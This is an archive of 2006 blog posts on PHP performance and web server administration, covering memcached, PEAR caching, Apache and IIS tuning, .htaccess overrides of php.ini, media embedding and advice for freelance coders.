whenpenguinsattack.com

Tuesday, January 31, 2006

using memcached and php

What is memcached?

memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.

Danga Interactive developed memcached to enhance the speed of LiveJournal.com, a site which was already doing 20 million+ dynamic page views per day for 1 million users with a bunch of webservers and a bunch of database servers. memcached dropped the database load to almost nothing, yielding faster page load times for users, better resource utilization, and faster access to the databases on a memcache miss.

How it Works

First, you start up the memcached daemon on as many spare machines as you have. The daemon has no configuration file, just a few command-line options, only three or four of which you'll likely use:

# ./memcached -d -m 2048 -l 10.0.0.40 -p 11211

This starts memcached up as a daemon, using 2GB of memory, and listening on IP 10.0.0.40, port 11211. Because a 32-bit process can only address 4GB of virtual memory (usually significantly less, depending on your operating system), if you have a 32-bit server with 4-64GB of memory using PAE you can just run multiple processes on the machine, each using 2 or 3GB of memory.

Shouldn't the database do this?

Regardless of which database you use (MS-SQL, Oracle, Postgres, MySQL-InnoDB, etc.), there's a lot of overhead in implementing ACID properties in an RDBMS, especially when disks are involved, which means queries are going to block. For databases that aren't ACID-compliant (like MySQL-MyISAM), that overhead doesn't exist, but reading threads block on the writing threads.

What about shared memory?

The first thing people generally do is cache things within their web processes. But this means your cache is duplicated multiple times, once for each mod_perl/PHP/etc thread. This is a waste of memory and you'll get low cache hit rates. If you're using a multi-threaded language or a shared memory API (IPC::Shareable, etc), you can have a global cache for all threads, but it's per-machine. It doesn't scale to multiple machines. Once you have 20 webservers, those 20 independent caches start to look just as silly as when you had 20 threads with their own caches on a single box. (plus, shared memory is typically laden with limitations)

The memcached server and clients work together to implement one global cache across as many machines as you have. In fact, it's recommended you run both web nodes (which are typically memory-lite and CPU-hungry) and memcached processes (which are memory-hungry and CPU-lite) on the same machines. This way you'll save network ports.

What about MySQL 4.x query caching?

MySQL query caching is less than ideal, for a number of reasons:

MySQL's query cache destroys the entire cache for a given table whenever that table is changed. On a high-traffic site with updates happening many times per second, this makes the cache practically worthless. In fact, it's often harmful to have it on, since there's an overhead to maintain the cache.

On 32-bit architectures, the entire server (including the query cache) is limited to a 4 GB virtual address space. memcached lets you run as many processes as you want, so you have no limit on memory cache size.

MySQL has a query cache, not an object cache. If your objects require extra expensive construction after the data retrieval step, MySQL's query cache can't help you there.

If the data you need to cache is small and you do infrequent updates, MySQL's query caching should work for you. If not, use memcached.

What about database replication?

You can spread your reads with replication, and that helps a lot, but you can't spread writes (they have to process on all machines), and they'll eventually consume all your resources. You'll find yourself adding replicated slaves at an ever-increasing rate to make up for the diminishing returns each additional slave provides.

The next logical step is to horizontally partition your dataset onto different master/slave clusters so you can spread your writes, and then teach your application to connect to the correct cluster depending on the data it needs.
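That routing step can be sketched in a few lines of PHP. The cluster names and the modulo-on-user-ID scheme below are illustrative assumptions for this sketch, not a recommendation; real sites often use hashing or a lookup table instead.

```php
<?php
// Hypothetical cluster layout: each entry is the DSN of one
// master/slave cluster. Names are invented for this sketch.
$clusters = array(
    0 => 'mysql:host=db-cluster-0',
    1 => 'mysql:host=db-cluster-1',
    2 => 'mysql:host=db-cluster-2',
);

// Map a user to a cluster deterministically, so every part of the
// application agrees on where that user's rows live.
function cluster_for_user($userId, $clusterCount)
{
    return $userId % $clusterCount;
}

$dsn = $clusters[cluster_for_user(1337, count($clusters))];
echo $dsn, "\n"; // 1337 % 3 == 2, so db-cluster-2
```

Because the mapping is a pure function of the user ID, no shared state is needed to decide which cluster to query.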

While this strategy works, and is recommended, more databases (each with a bunch of disks) statistically leads to more frequent hardware failures, which are annoying.

With memcached you can reduce your database reads to a mere fraction, leaving the databases to mainly do infrequent writes, and end up getting much more bang for your buck, since your databases won't be blocking themselves doing ACID bookkeeping or waiting on writing threads.

Is memcached fast?

Very fast. It uses libevent to scale to any number of open connections (using epoll on Linux, if available at runtime), uses non-blocking network I/O, refcounts internal objects (so the same object can be in transit to multiple clients at once), and uses its own slab allocator and hash table so virtual memory never gets externally fragmented and allocations are guaranteed O(1).

What about race conditions?

You might wonder: "What if the get_foo() function adds a stale version of the Foo object to the cache right as/after the user updates their Foo object via update_foo()?"

While the server and API only have one way to get data from the cache, there exist three ways to put data in:

set -- unconditionally sets a given key with a given value (update_foo() should use this)
add -- adds to the cache, only if it doesn't already exist (get_foo() should use this)
replace -- sets in the cache only if the key already exists (not as useful, only for completeness)

Additionally, all three support an expiration time.
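To make those semantics concrete, here is a toy in-process cache (a plain PHP class written for this sketch, not the real client) whose set()/add()/replace() methods mimic the three commands; the pecl memcache client exposes methods with the same names and behavior.

```php
<?php
// Toy cache illustrating memcached's three storage commands.
// A real deployment would use the pecl memcache client instead.
class ToyCache
{
    private $data = array();

    // set: unconditional store (what update_foo() should use).
    public function set($key, $value)
    {
        $this->data[$key] = $value;
        return true;
    }

    // add: store only if the key is absent (what get_foo() should use),
    // so a demand-fill never clobbers a fresher value.
    public function add($key, $value)
    {
        if (array_key_exists($key, $this->data)) {
            return false;
        }
        $this->data[$key] = $value;
        return true;
    }

    // replace: store only if the key already exists.
    public function replace($key, $value)
    {
        if (!array_key_exists($key, $this->data)) {
            return false;
        }
        $this->data[$key] = $value;
        return true;
    }

    public function get($key)
    {
        return isset($this->data[$key]) ? $this->data[$key] : false;
    }
}

$cache = new ToyCache();
var_dump($cache->add('foo', 'v1'));     // bool(true): key was absent
var_dump($cache->add('foo', 'stale'));  // bool(false): add never overwrites
var_dump($cache->set('foo', 'v2'));     // bool(true): set always wins
var_dump($cache->get('foo'));           // string(2) "v2"
```

In production you would swap the toy class for the real client, e.g. $memcache = new Memcache(); $memcache->connect('10.0.0.40', 11211); and use its set()/add()/replace() methods the same way.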

The server can be downloaded here: http://www.danga.com/memcached/dist/memcached-1.1.12.tar.gz

The PHP module can be downloaded here: http://pecl.php.net/package/memcache

php optimization myths

Some optimizations are useful. Others are a waste of time - sometimes the improvement is negligible, and sometimes the PHP internals change, rendering the tweak obsolete.
Here are some common PHP legends:

a. echo is faster than print
Echo is supposed to be faster because it doesn't return a value while print does. From my benchmarks with PHP 4.3, the difference is negligible. And in some situations, print is faster than echo (when ob_start is enabled).
b. strip off comments to speed up code
If you use an opcode cache, comments are already ignored. This is a myth from PHP3 days, when each line of PHP was interpreted in run-time.
c. 'var='.$var is faster than "var=$var"
This used to be true in PHP 4.2 and earlier. This was fixed in PHP 4.3. Note (22 June 2004): apparently the 4.3 fix reduced the overhead, but not completely. However I find the performance difference to be negligible.
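If you want to check claims like these on your own setup, a crude loop benchmark is enough to see whether the difference matters; absolute timings vary by PHP version and machine, so only the ratio is interesting.

```php
<?php
// Compare single-quote concatenation with double-quote interpolation.
$var = 'world';
$n = 100000;

$t = microtime(true);
for ($i = 0; $i < $n; $i++) {
    $s = 'var=' . $var;
}
$concat = microtime(true) - $t;

$t = microtime(true);
for ($i = 0; $i < $n; $i++) {
    $s = "var=$var";
}
$interp = microtime(true) - $t;

printf("concat: %.4fs  interpolation: %.4fs\n", $concat, $interp);
```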
Do References Speed Your Code?
References do not provide any performance benefits for strings, integers and other basic data types. For example, consider the following code:

function TestRef(&$a)
{
$b = $a;
$c = $a;
}
$one = 1;

TestRef($one);
And the same code without references:
function TestNoRef($a)
{
$b = $a;
$c = $a;
}
$one = 1;

TestNoRef($one);

PHP does not actually create duplicate variables when "pass by value" is used, but uses high-speed reference counting internally. So in TestRef(), $b and $c take longer to set because the references have to be tracked, while in TestNoRef(), $b and $c just point to the original value of $a, and the reference counter is incremented. So TestNoRef() will execute faster than TestRef().
In contrast, functions that accept array and object parameters have a performance advantage when references are used. This is because arrays and objects do not use reference counting, so multiple copies of an array or object are created if "pass by value" is used. So the following code:

function ObjRef(&$o)
{
$a = $o->name;
}

is faster than:

function ObjNoRef($o)
{
$a = $o->name;
}

Note: In PHP 5, all objects are passed by reference automatically, without the need of an explicit & in the parameter list. PHP 5 object performance should be significantly faster.

Monday, January 30, 2006

Optimizing Object-oriented PHP

1. Initialise all variables before use.

2. Dereference all global/property variables that are frequently used in a method and put the values in local variables if you plan to access the value more than twice.

3. Try placing frequently used methods in the derived classes.
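As an illustration of tip 2 above, here is a sketch (the Counter class and its method names are made up for this example): the slow version dereferences the property on every loop iteration, while the fast version works on a local copy and writes the property back once.

```php
<?php
class Counter
{
    public $count = 0;

    // Slower: $this->count is dereferenced on every iteration.
    public function sumSlow($n)
    {
        for ($i = 0; $i < $n; $i++) {
            $this->count += $i;
        }
        return $this->count;
    }

    // Faster: accumulate in a local variable, write back once.
    public function sumFast($n)
    {
        $count = $this->count;
        for ($i = 0; $i < $n; $i++) {
            $count += $i;
        }
        $this->count = $count;
        return $this->count;
    }
}

$a = new Counter();
$b = new Counter();
var_dump($a->sumSlow(1000) === $b->sumFast(1000)); // bool(true)
```

Both methods compute the same result; only the number of property dereferences differs.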

Warning: as PHP is going through a continuous improvement process, things might change in the future.

More Details

I have found that calling an object method (a function defined in a class) is about twice as slow as a normal function call. To me that's quite acceptable and comparable to other OOP languages.

Inside a method (the following ratios are approximate only):

1. Incrementing a local variable in a method is the fastest. Nearly the same as calling a local variable in a function.
2. Incrementing a global variable is 2 times slower than a local variable.
3. Incrementing an object property (eg. $this->prop++) is 3 times slower than a local variable.
4. Incrementing an undefined local variable is 9-10 times slower than a pre-initialized one.
5. Just declaring a global variable without using it in a function also slows things down (by about the same amount as incrementing a local var). PHP probably does a check to see if the global exists.
6. Method invocation appears to be independent of the number of methods defined in the class because I added 10 more methods to the test class (before and after the test method) with no change in performance.
7. Methods in derived classes run faster than ones defined in the base class.
8. A function call with one parameter and an empty function body takes about the same time as doing 7-8 $localvar++ operations. A similar method call is of course about 15 $localvar++ operations.
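The ratios above came from micro-benchmarks; a minimal harness for reproducing that kind of measurement yourself might look like the following sketch (the class and function names are mine, and absolute timings depend heavily on your PHP version and hardware).

```php
<?php
class Bench
{
    public $prop = 0;

    // Increment an object property $n times.
    public function incrementProperty($n)
    {
        for ($i = 0; $i < $n; $i++) {
            $this->prop++;
        }
    }

    // Increment a local variable $n times.
    public function incrementLocal($n)
    {
        $local = 0;
        for ($i = 0; $i < $n; $i++) {
            $local++;
        }
        return $local;
    }
}

// Time a callable; returns elapsed seconds as a float.
function timeIt($callable, $n)
{
    $t = microtime(true);
    call_user_func($callable, $n);
    return microtime(true) - $t;
}

$b = new Bench();
$n = 100000;
$tProp  = timeIt(array($b, 'incrementProperty'), $n);
$tLocal = timeIt(array($b, 'incrementLocal'), $n);
printf("property: %.4fs  local: %.4fs\n", $tProp, $tLocal);
```

Run each measurement several times and take the minimum to reduce noise from other processes.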

Using PEAR cache

The PEAR Cache is a set of caching classes that allows you to cache multiple types of data, including HTML and images.

The most common use of the PEAR Cache is to cache HTML text. To do this, we use the Output buffering class which caches all text printed or echoed between the start() and end() functions:

require_once("Cache/Output.php");

$cache = new Cache_Output("file", array("cache_dir" => "cache/") );

if ($contents = $cache->start(md5("this is a unique key!"))) {

#
# aha, cached data returned
#

print $contents;
print "<p>Cache Hit</p>";

} else {

#
# no cached data, or cache expired
#

print "<p>Don't leave home without it…</p>"; # place in cache
print "<p>Stand and deliver</p>"; # place in cache
print $cache->end(10);

}

The Cache constructor takes the storage driver to use as the first parameter. File, database and shared memory storage drivers are available; see the pear/Cache/Container directory. Benchmarks by Ulf Wendel suggest that the "file" storage driver offers the best performance. The second parameter is the storage driver options. The options are "cache_dir", the location of the caching directory, and "filename_prefix", which is the prefix to use for all cached files. Strangely enough, cache expiry times are not set in the options parameter.

To cache some data, you generate a unique id for the cached data using a key. In the above example, we used md5("this is a unique key!").

The start() function uses the key to find a cached copy of the contents. If the contents are not cached, an empty string is returned by start(), and all future echo() and print() statements will be buffered in the output cache, until end() is called.

The end() function returns the contents of the buffer, and ends output buffering. The end() function takes as its first parameter the expiry time of the cache. This parameter can be the seconds to cache the data, or a Unix integer timestamp giving the date and time to expire the data, or zero to default to 24 hours.

Another way to use the PEAR cache is to store variables or other data. To do so, you can use the base Cache class:

<?php

require_once("Cache.php");

$cache = new Cache("file", array("cache_dir" => "cache/") );
$id = $cache->generateID("this is a unique key");

if ($data = $cache->get($id)) {

print "Cache hit.<br>Data: $data";

} else {

$data = "The quality of mercy is not strained...";
$cache->save($id, $data, $expires = 60);
print "Cache miss.<br>";

}

?>

To save the data we use save(). If your unique key is already a legal file name, you can bypass the generateID() step. Objects and arrays can be saved because save() will serialize the data for you. The last parameter controls when the data expires; this can be the seconds to cache the data, or a Unix integer timestamp giving the date and time to expire the data, or zero to use the default of 24 hours. To retrieve the cached data we use get().

You can delete a cached data item using $cache->delete($id) and remove all cached items using $cache->flush().

New: A faster Caching class is Cache-Lite. Highly recommended.

Sunday, January 29, 2006

How to install php 4.4.1 on iis 6.0 - updated

Earlier this month, I wrote a howto on installing PHP 4.4.1 on IIS 6.0. I have a small change to those instructions.

As I have recently discovered (I'm not sure why I never saw this before), if you set doc_root to your web directory, IIS will not be able to see a PHP file in any of your subdirectories.

This value doesn't even need to be set at all.

So, rather than setting the doc_root to your web root directory, don't bother setting it at all, unless you know what you are doing.

The php zend engine

The Zend Engine is the internal compiler and runtime engine used by PHP4. It was developed by Zeev Suraski and Andi Gutmans; the name "Zend" is a contraction of their first names. In the early days of PHP4, it worked as follows:



The PHP script was loaded by the Zend Engine and compiled into Zend opcode. Opcodes, short for operation codes, are low-level binary instructions. The opcode was then executed and the generated HTML sent to the client. The opcode was flushed from memory after execution.

Today, there are a multitude of products and techniques to help you speed up this process. In the following diagram, we show how modern PHP scripts work; all the shaded boxes are optional.



PHP Scripts are loaded into memory and compiled into Zend opcodes.

Friday, January 27, 2006

How to play a movie on your website

The following HTML code will allow you to play Flash, QuickTime, RealMedia, or Microsoft media files from your web page.

Flash:






<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'
codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0'
width="320" height="240">
<param name="movie" value="http://yourpage/yourmovie.swf">
<param name="loop" value="true">
<embed src="http://yourpage/yourmovie.swf" width="320"
height="240" loop="true" type='application/x-shockwave-flash'
pluginspage='http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash'>
</embed>
</object>





Quicktime:






<object classid='clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B'
width="320" height="255" codebase='http://www.apple.com/qtactivex/qtplugin.cab'>
<param name="src" value="http://yourpage/yourmovie.mov">
<param name="controller" value="true">
<param name="loop" value="true">
<embed src="http://yourpage/yourmovie.mov" width="320" height="255"
controller="true" loop="true" pluginspage='http://www.apple.com/quicktime/download/'>
</embed>
</object>




REAL:













<object classid='clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA'
width="320" height="240">
<param name='src' value="http://yourpage/yourmovie.rpm">
<param name='controls' value='imagewindow'>
<param name='console' value='video'>
<embed src="http://yourpage/yourmovie.rpm" width="320" height="240"
loop="true" type='audio/x-pn-realaudio-plugin' controls='imagewindow' console='video' autostart="true">
</embed>
</object>

<object classid='clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA'
width="320" height='30'>
<param name='src' value="http://yourpage/yourmovie.rpm">
<param name='controls' value='ControlPanel'>
<param name='console' value='video'>
<embed src="http://yourpage/yourmovie.rpm" width="320" height='30'
controls='ControlPanel' type='audio/x-pn-realaudio-plugin' console='video' autostart="true">
</embed>
</object>

<a href="http://yourpage/yourmovie.ram">Launch in external player</a>




Microsoft media:








<object id='mediaPlayer' width="320" height="285"
classid='CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95'
codebase='http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,701'
standby='Loading Microsoft Windows Media Player components...' type='application/x-oleobject'>
<param name='fileName' value="http://yourpage/yourmovie">
<param name='autoStart' value="true">
<param name='showControls' value="true">
<embed type='application/x-mplayer2'
pluginspage='http://microsoft.com/windows/mediaplayer/en/download/'
id='mediaPlayer' name='mediaPlayer' displaysize='4' autosize='-1'
bgcolor='darkblue' showcontrols="true" showtracker='-1'
showdisplay='0' showstatusbar='-1' videoborder3d='-1' width="320" height="285"
src="http://yourpage/yourmovie" autostart="true" designtimesp='5311' loop="false">
</embed>
</object>

<a href="http://yourpage/yourmovie">Launch in external player</a>

Wednesday, January 25, 2006

Launching a process from php

I have written a couple of simple functions that will allow you to launch a separate process from PHP. This comes in handy because it can be called from the command line or through a web page. The initial calling script does not block; it returns immediately.

code can be downloaded Here
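In case the download link rots, here is a minimal sketch of the technique on Unix-like systems (the function name launch_background() is mine): redirect the command's output and background it with &, so exec() returns immediately instead of waiting for the command to finish.

```php
<?php
// Launch a command as a detached background process (Unix-like systems).
// exec() normally waits for the command to complete; redirecting all
// output and appending '&' makes the shell return control immediately.
// On Windows a different approach (e.g. COM or "start /B") is needed.
function launch_background($cmd)
{
    exec($cmd . ' > /dev/null 2>&1 &');
}

$start = microtime(true);
launch_background('sleep 5');
$elapsed = microtime(true) - $start;

printf("returned after %.3fs\n", $elapsed); // far less than 5 seconds
```

If you need the child's output later, redirect to a log file instead of /dev/null.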

Tuesday, January 24, 2006

improving php performance on apache

Apache is available on both Unix and Windows. It is the most popular web server in the world. Apache 1.3 uses a pre-forking model for web serving. When Apache starts up, it creates multiple child processes that handle HTTP requests. The initial parent process acts like a guardian angel, making sure that all the child processes are working properly and coordinating everything. As more HTTP requests come in, more child processes are spawned to process them. As the HTTP requests slow down, the parent will kill the idle child processes, freeing up resources for other processes. The beauty of this scheme is that it makes Apache extremely robust. Even if a child process crashes, the parent and the other child processes are insulated from the crashing child.
The pre-forking model is not as fast as some other possible designs, but to me it is "much ado about nothing" on a server serving PHP scripts, because other bottlenecks will kick in long before Apache performance issues become significant. The robustness and reliability of Apache are more important.

Apache 2.0 offers operation in multi-threaded mode. My benchmarks indicate there is little performance advantage in this mode. Also be warned that many PHP extensions are not compatible (e.g. GD and IMAP). Tested with Apache 2.0.47.
Apache is configured using the httpd.conf file. The following parameters are particularly important in configuring child processes:


MaxClients : default: 256
The maximum number of child processes to create. The default means that up to 256 HTTP requests can be handled concurrently. Any further connection requests are queued.

StartServers: default: 5
The number of child processes to create on startup.

MinSpareServers: default:5
The number of idle child processes that should be created. If the number of idle child processes falls to less than this number, 1 child is created initially, then 2 after another second, then 4 after another second, and so forth till 32 children are created per second.

MaxSpareServers: default:10
If more than this number of child processes are alive, then these extra processes will be terminated.

MaxRequestsPerChild: default: 0
Sets the number of HTTP requests a child can handle before terminating. Setting it to 0 means never terminate. Set this to a value between 100 and 10000 if you suspect memory leaks are occurring, or to free under-utilized resources.

For large sites, values close to the following might be better:

MinSpareServers 32
MaxSpareServers 64
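Pulling the directives together, a plausible httpd.conf fragment for a busy prefork server might look like this; the values are illustrative starting points, not universal recommendations.

```apacheconf
# Process management for a high-traffic Apache prefork server.
MaxClients          256
StartServers        32
MinSpareServers     32
MaxSpareServers     64
# Recycle children periodically in case of memory leaks.
MaxRequestsPerChild 10000
```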

Apache on Windows behaves differently. Instead of using child processes, Apache uses threads. The above parameters are not used. Instead we have one parameter: ThreadsPerChild, which defaults to 50. This parameter sets the number of threads that can be spawned by Apache. As there is only one child process in the Windows version, the default setting of 50 means only 50 concurrent HTTP requests can be handled. For web servers experiencing higher traffic, increase this value to between 256 and 1024.

Other useful performance parameters you can change include:


SendBufferSize: Set to OS default
Determines the size of the output buffer (in bytes) used in TCP/IP connections. This is primarily useful for congested or slow networks when packets need to be buffered; you then set this parameter close to the size of the largest file normally downloaded. One TCP/IP buffer will be created per client connection.

KeepAlive [on|off] default: On
In the original HTTP specification, every HTTP request had to establish a separate connection to the server. To reduce the overhead of frequent connects, the keep-alive header was developed. Keep-alive tells the server to reuse the same socket connection for multiple HTTP requests.

If a separate dedicated web server serves all images, you can disable this option. This technique can substantially improve resource utilization.

KeepAliveTimeout:default:15
The number of seconds to keep the socket connection alive. This time includes the generation of content by the server and acknowledgements by the client. If the client does not respond in time, it must make a new connection.

This value should be kept low as the socket will be idle for extended periods otherwise.

MaxKeepAliveRequests: default:100
Socket connections will be terminated when the number of requests set by MaxKeepAliveRequests is reached. Keep this to a high value below MaxClients or ThreadsPerChild.

TimeOut: default:300
Disconnect when idle time exceeds this value. You can set this value lower if your clients have low latencies.

LimitRequestBody: default:0
Maximum size of a PUT or POST. 0 means there is no limit.

If you do not require DNS lookups and you are not using the htaccess file to configure Apache settings for individual directories you can set:

# disable DNS lookups: PHP scripts only get the IP address
HostnameLookups off

# disable htaccess checks

<Directory />


AllowOverride none


</Directory>



If you are not worried about the directory security when accessing symbolic links, turn on FollowSymLinks and turn off SymLinksIfOwnerMatch to prevent additional lstat() system calls from being made:

Options FollowSymLinks

#Options SymLinksIfOwnerMatch

Tuning IIS for PHP

IIS is a multi-threaded web server available on Windows NT and 2000. From the Internet Services Manager, it is possible to tune the following parameters:

Performance Tuning based on the number of hits per day: Determines how much memory to preallocate for IIS. (Performance Tab).

Bandwidth throttling: Controls the bandwidth per second allocated per web site. (Performance Tab).

Process throttling: Controls the CPU% available per Web site. (Performance Tab).

Timeout: Default is 900 seconds. Set to a lower value on a Local Area Network. (Web Site Tab).

HTTP Compression: In IIS 6, you can compress dynamic pages, HTML, and images. It can be configured to cache compressed static HTML and images. By default, compression is off.

HTTP compression has to be enabled for the entire physical server. To turn it on open the IIS console, right-click on the server (not any of the subsites, but the server in the left-hand pane), and get Properties. Click on the Service tab, and select "Compress application files" to compress dynamic content, and "Compress static files" to compress static content.

You can also configure the default isolation level of your web site. In the Home Directory tab under Application Protection, you can define your level of isolation. A highly isolated web site will run slower because it is running as a separate process from IIS, while running the web site in the IIS process is the fastest but will bring down the server if there are serious bugs in the web site code. Currently I recommend running PHP web sites using CGI, or using ISAPI with Application Protection set to high.

You can also use regedit.exe to modify the following IIS 5 registry settings, stored at this location:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Inetinfo\Parameters

MemCacheSize: Sets the amount of memory that IIS will use for its file cache. By default IIS will use 50% of available memory. Increase it if IIS is the only application on the server. Value is in megabytes.

MaxCachedFileSize: Determines the maximum size of a file cached in the file cache in bytes. Default is 262,144 (256K).

ObjectCacheTTL: Sets the length of time (in milliseconds) that objects in the cache are held in memory. Default is 30,000 milliseconds (30 seconds).

MaxPoolThreads: Sets the number of pool threads to create per processor. Determines how many CGI applications can run concurrently. Default is 4. Increase this value if you are using PHP in CGI mode.

ListenBackLog: Specifies the maximum number of active Keep Alive connections that IIS maintains in the connection queue. Default is 15, and should be increased to the number of concurrent connections you want to support. Maximum is 250.
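For illustration, these settings can be collected in a .reg file and imported with regedit; the dword values below are examples only, not recommendations.

```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Inetinfo\Parameters]
"MaxCachedFileSize"=dword:00040000
"MaxPoolThreads"=dword:00000008
"ListenBackLog"=dword:000000c8
```

(0x40000 is 262,144 bytes, 0x8 is 8 threads per processor, and 0xc8 is 200 queued connections.)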

If the settings are missing from this registry location, the defaults are being used.

High Performance on Windows: IIS and FastCGI

After much testing, I find that the best PHP performance on Windows is offered by using IIS with FastCGI. CGI is a protocol for calling external programs from a web server. It is not very fast because CGI programs are terminated after every page request. FastCGI modifies this protocol for high performance, by making the CGI program persist after a page request, and reusing the same CGI program when a new page request comes in.

As the installation of FastCGI with IIS is complicated, you should use the EasyWindows PHP Installer. This will install PHP, FastCGI and Turck MMCache for the best performance possible. This installer can also install PHP for Apache 1.3/2.0.

Sunday, January 22, 2006

Five Tips for Freelance PHP Coders

By Elizabeth Naramore

Introduction

If you've decided that working for yourself as a self-employed web developer or PHP coder sounds like your cup of tea, but the task feels a bit daunting, then listen up. We've put together a list of helpful tips that will enable you to go wherever it is you want your own business to go. These are in no particular order, and we consider them all equally important. Please be advised that this is by no means a guarantee of success, nor a comprehensive list of the obstacles you may encounter.

1. Guard Your Reputation With Your Life

Your reputation is the most important asset you have, and you should treat it as such. You might be the most competent coder on the planet, but if you have a reputation for being difficult to work with, or unreliable, getting new clients will be more difficult, you will lose referrals from current clients and you will find you will have to prove yourself over and over again. Don't make promises you can't keep, and remember that your actions today may have a profound effect on the future success of your business. Maintaining a contract business is difficult enough without you inadvertently sabotaging your own efforts.

2. Be Passionate About Your Work

Clients want to see genuine enthusiasm and they will take comfort in the fact that you have a personal investment in their web site. A larger company may be able to offer the same coding services that you can, but you can use that "personal touch" to your advantage.

3. Be Responsive And Communicate Often

Even if things are crazy or you are extremely behind schedule, taking five minutes to make a quick change to a client's site, or sending a quick e-mail to update your client on the status of his project, will go a long way toward defusing a potentially damaging situation. Of course, this will only buy you a little time, but it is much better than ignoring a client altogether and aggravating the situation.

You can also provide status reports for your clients weekly or bi-weekly, so they are kept in the loop as to how things are progressing. Knowing that you will have to present these reports helps you maintain accountability for the project and keeps you moving forward, as well as keeping your client informed.

Along with this goes the advice of promptly returning phone calls and e-mails. Some of us are averse to using the phone, but by giving your client the courtesy of returning a phone call, you are in essence communicating that you value their business and that you are there to help. Likewise, e-mails should be responded to immediately, not three or four days later.

4. Don't Be An Ostrich

When things get overwhelming (and they will), resist the urge to stick your head in the sand and play another game. This will only exacerbate the situation. If you cannot see the light at the end of the tunnel, get help. Enlist a trusted colleague with a few small pieces of the bigger project. Better yet, enlist several trusted colleagues. Whatever you do, make sure you're doing something to chip away at the workload.

5. Remember That You Are Your Own Ambassador

Tact and diplomacy can be your best friends, especially when a client is asking for the impossible. Unlike coding jobs in the industry, where a full staff of sales, marketing, and executive types buffers the client from the dungeons of the coders, when you are your own boss you are thrust onto the surface world and must deal directly with the clients. Try not to be condescending or openly laugh at their ignorance; you will only alienate them and risk losing them as a client (and any referrals they might have passed your way). At least wait until they are no longer within earshot; then mock away.

Friday, January 20, 2006

How to override php.ini

This tip is for people running Apache and PHP. I know it works with FreeBSD 5.0 / PHP 4.x / Apache 2.x; I am not sure about other operating systems, web servers, or PHP versions.

As an example scenario, a client of mine needed a PHP script that would allow him to upload any type of file to his server. He also wanted the default maximum of 4 MB raised to 30 MB. His website was being hosted on a shared server, so there was no access to php.ini. Here is how this can be done.

1) Create a file called .htaccess in the same directory as your php script (this will apply to any php script that is in this directory).

2) For each value you want to override, use the following format: php_value php_var_name php_var_value

Example:

php_value memory_limit 34M
php_value post_max_size 33M
php_value upload_max_filesize 32M
php_value max_execution_time 600

Wednesday, January 18, 2006

Nullsoft open source installer (NSIS 2.12) released

What is Nullsoft open source installer and why do I need it?

An installer is the first experience a user has with your application. Slow or unsuccessful software installations are among the most irritating computer problems. A quick and user-friendly installer is therefore an essential part of your software product.
NSIS (Nullsoft Scriptable Install System) is a tool that allows programmers to create such installers for Windows. It is released under an open source license and is completely free for any use.

NSIS creates installers that are capable of installing, uninstalling, setting system settings, extracting files, etc. Because it's based on script files, you can fully control every part of your installers. The script language supports variables, functions, string manipulation, just like a normal programming language - but designed for the creation of installers. Even with all these features, NSIS is still the smallest installer system available. With the default options, it has an overhead of only 34 KB.

A brief list of companies/applications using this installer:

Winamp (audio player)
SHOUTcast server, plug-ins (music streaming system)
Google (Gmail, Picasa 2, Google Talk, Video)
ATi (just as a wrapper)
DivX (video codec)
Kaspersky (antivirus)
Intel C Compiler (free evaluation version)
City of Heroes (commercial MMORPG game)
Sun Java Web Start
UC Berkeley (computer security CD for campus residents)
Trolltech

The latest version can be downloaded Here
An example install script can be found Here

Tuesday, January 17, 2006

Optimizing PHP - a first look (part one)

By Leon Atkinson

One reason I like PHP is that it allows the freedom to quickly create Web applications without worrying about following all the rules of proper design. When it comes to rapid prototyping, PHP shines. With this power comes the responsibility to write clean code when it's time to write longer-lasting code. Sticking to a style guide helps you write understandable programs, but eventually you will write code that doesn't execute fast enough.

Optimization is the process of fine-tuning a program to increase speed or reduce memory usage. Memory usage is not as important as it once was, because memory is relatively inexpensive. However, shorter execution times are always desirable.

There are many tips for writing efficient programs, and I can hardly discuss them all here. And anyway, that would be like giving you a fish instead of teaching you to catch your own. This month, I will review the techniques I use for speeding up my PHP scripts.

When to optimize


Before you write a program, commit yourself to writing clearly at the expense of performance. Follow coding conventions, such as using mysql_fetch_row instead of mysql_result. But keep in mind that programming time is expensive, especially when programmers must struggle to understand code. The simplest solution is usually best.

When you finish a program, consider whether its performance is adequate. If your project benefits from a formal requirements specification, refer to any performance constraints. It's not unusual to include maximum page load times for Web applications. Many factors affect the time between clicking a link and viewing a complete page. Be sure to eliminate factors you cannot control, such as the speed of the network.

If you determine that your program needs optimization, consider upgrading the hardware first. This may be the least expensive alternative. In 1965, Gordon Moore observed that the number of transistors on a chip doubled roughly every two years, an observation now known as Moore's Law. Despite this steep increase in power, the cost of computing drops over time: performance keeps climbing while CPU prices remain relatively stable. Upgrading your server is likely less expensive than paying programmers to optimize the code.

After upgrading hardware, consider upgrading the software supporting your program. Start with the operating system. Linux and BSD Unix have the reputation of squeezing more performance out of older hardware, and they may outperform commercial operating systems, especially if you factor in server crashes.

If your program uses a database, consider the differences between relational databases. If you can do without stored procedures and sub-queries, MySQL may offer a significant performance enhancement over other database servers. Check out the benchmarks provided on their Web site. Also, consider giving your database server more memory.

Two Zend products can help speed execution times of PHP programs. The first is the Zend Optimizer. This optimizes PHP code as it passes through the Zend Engine. It can run PHP programs 40% to 100% faster than without it. Like PHP, the Zend Optimizer is free. The next product to consider is the Zend Cache. It provides even more performance over the optimizer by keeping compiled code in memory. Some users have experienced 300% improvements. Contact Zend to purchase the Zend Cache.

Measuring performance

Before you can begin optimizing, you must be able to measure performance. The two tools I'll discuss are inserting HTML comments and using Apache's ApacheBench utility. PHP applications run on a Web server, but the overhead added by serving HTML documents over a network should be factored out of your measurements.

